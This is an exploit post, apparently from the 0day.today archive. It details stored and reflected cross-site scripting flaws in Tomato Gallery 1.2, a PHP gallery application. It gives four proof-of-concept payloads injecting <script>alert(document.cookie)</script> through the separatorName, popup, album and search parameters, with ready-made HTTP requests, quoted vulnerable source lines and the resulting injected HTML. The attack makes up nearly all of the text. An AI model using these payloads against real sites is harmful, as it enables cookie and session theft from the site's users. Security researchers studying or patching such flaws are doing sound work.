Exploit for php platform in category web applications
# author: lemlajt
# software link: http://tomatogallery.yzx.se/
# version: 1.2
# tested on: linux
#cve :
poc0.1 :
1. http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php
2. click @ "Add Separator" and type: bla'';!--<script>alert(
document.cookie)</script>=&{()} in the box
3. persistant.
try:
POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/addSeparator.php
?separatorName=bla'';!--<script>alert(document.cookie)</script>=&{()} HTTP/1.1
more:
cat -n $tomato_dir/ajaxinfo/addSeparator.php
--- <ut ------ <ut ------ <ut ------ <ut ---
11 $albumName = $_GET["separatorName"];
--- <ut ------ <ut ------ <ut ------ <ut ---
... and more, enjoy! o/
* csrf?
poc0.2 :
POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/popupSource.php?popup=create-album&album=undefined HTTP/1.1
;]
in second line of ajaxinfo/popupSource.php we see:
$popup = $_GET['popup'];
replace 'create-album' to: ''script
in source of generated page find your alert:
<li id="item_0" style="margin:0; padding:0; list-style:none;" lang="test;!--<script>alert(document.cookie)</script>=">
<div class="group" onMouseOver="hoverAlbum('in','1')" onMouseOut="hoverAlbum('out','1')" id="album1">
<div class="stripe"></div>
<div class="albumText" style="position:absolute;" id="albumText1"
onclick="this.innerHTML = this.lang" lang="test';!--<script>alert(document.cookie)</script>=">test';!--<script>alert(document.cookie)</script>=
</div>
file inputs?
poc0.3 : some error when typing:
http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php?album=%27%27;!--%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=&{%28%29}#
poc0.4 : xss via GET
$search = '';!--<script>alert(document.cookie)</script>=&{()}
regards Inj3ct0r Team!
# 0day.today [2018-04-02] #